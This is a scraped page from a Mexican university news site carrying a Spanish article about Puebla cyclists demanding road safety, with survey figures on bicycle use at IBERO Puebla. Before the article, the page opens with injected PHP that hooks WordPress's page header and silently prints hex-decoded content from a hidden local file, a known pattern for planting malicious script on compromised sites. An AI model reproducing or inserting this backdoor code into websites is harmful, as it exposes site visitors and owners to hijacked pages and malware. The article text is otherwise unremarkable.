if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Ciclistas poblanos exigen seguridad en la ciudad con más muertes por atropello – La Opinión Universitaria La Opinión Universitaria
Menu

Ciclistas poblanos exigen seguridad en la ciudad con más muertes por atropello

 

 

Pedalear es político. La cultura de la bicicleta se circunscribe en una serie de factores que contemplan los beneficios personales y al medioambiente, pero también buscan poner en primer plano a quienes se desplazan en dos ruedas porque es la única alternativa viable.

 

En el aspecto de políticas institucionales, la IBERO Puebla ha buscado sumar progresivamente el uso de vehículos no motorizados como parte de sus estrategias para un campus sustentable. Las acreditaciones otorgadas por UI GreenMetric, que la colocan como la universidad privada más cuidadosa del ambiente en el estado, avalan dichos esfuerzos. No obstante, el transporte alternativo continúa como la asignatura pendiente.

 

Durante un conversatorio con especialistas en la materia, el Dr. Francisco Valverde Díaz de León, académico de la Universidad Jesuita, enfatizó estos esfuerzos por promover el uso de bicicletas en la Comunidad Universitaria, pues “la bicicleta no es solo un estilo de vida, sino una necesidad para cambiar las condiciones de vida de nuestras ciudades”.

 

Para lograrlo, la Casa de Estudios tendrá que sortear algunos problemas generales expresados por su propia población. Una encuesta interna aplicada a 318 personas que no usan bicicleta reveló que el 62% de estas no cuentan con una. El principal motivo por el que no adquieren un vehículo de dos ruedas es el miedo o la sensación de inseguridad que les provoca el entorno.

 

Los encuestados alegaron que para hacer frente a estas barreras es necesario que existan mejores condiciones de seguridad, así como una cultura vial que sea respetuosa de los ciclistas. En la dimensión personal, reconocieron la necesidad de mejorar su condición física y viajar en compañía.

 

Por su parte, una muestra de 189 universitarios ciclistas contestó que la bicicleta representa más un medio recreativo que un transporte cotidiano. Este grupo, cuya edad promedio es de 29 años, señala que para llegar al campus pedaleando es necesario que existan más senderos seguros, ciclovías y educación vial. Además, destacan que un ciclista urbano siempre debe usar caso y luces distintivas.

 

 

Tweets recientes